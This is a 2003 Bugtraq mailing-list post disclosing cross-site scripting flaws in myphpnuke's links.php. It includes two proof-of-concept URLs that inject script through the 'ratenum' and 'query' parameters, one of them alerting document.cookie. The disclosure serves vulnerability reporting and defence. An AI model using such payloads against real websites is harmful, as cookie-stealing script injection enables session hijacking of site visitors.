Bugtraq mailing list archives

myphpnuke xss

From: Tacettin Karadeniz <tacettinkaradeniz () yahoo com>
Date: Wed, 19 Feb 2003 17:40:10 -0800 (PST)

Vendor:
http://www.myphpnuke.com

Subject: 
myphpnuke links.php vulnerability

myphpnuke is a website portal tool written in php.
There are many Cross Site Scripting issue on myphpnuke
.

Example:
http://WEB/myphpnuke/links.php?op=MostPopular&ratenum=[scr!pt]alert(document.cookie);[/scr!pt]&ratetype=percent

http://WEB/myphpnuke/links.php?op=search&query=[scr!pt]alert('tacettin () olympos org');[/scr!pt]?query=



__________________________________________________
Do you Yahoo!?
Yahoo! Shopping - Send Flowers for Valentine's Day
http://shopping.yahoo.com

Current thread:

myphpnuke xss Tacettin Karadeniz (Feb 20)